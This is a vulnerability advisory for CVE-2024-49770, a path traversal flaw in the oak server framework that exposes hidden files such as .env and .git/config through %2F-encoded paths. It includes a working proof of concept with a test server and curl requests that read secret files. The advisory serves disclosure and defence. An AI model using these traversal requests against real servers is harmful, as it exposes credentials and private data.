CVE-2024-49770
Path traversal in oak allows transfer of hidden files within the served root directory
Description
### Summary By default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by encoding `/` as its URL encoded form `%2F`. ### Details 1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first. 2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`. ### PoC ```ts // server.ts import { Application } from "jsr:@oak/[email protected]"; const app = new Application(); app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); } }); await app.listen({ port: 8000 }); ``` In terminal: ```bash # setup root directory mkdir root/.git echo SECRET_KEY=oops > root/.env echo oops > root/.git/config # start server deno run -A server.ts # in another terminal curl -D- http://127.0.0.1:8000/poc%2f../.env curl -D- http://127.0.0.1:8000/poc%2f../.git/config ``` ### Impact For an attacker this has potential to read sensitive user data or to gain access to server secrets.
How to fix CVE-2024-49770
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.
- —no fix listed
Is CVE-2024-49770 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, <= 14.1.0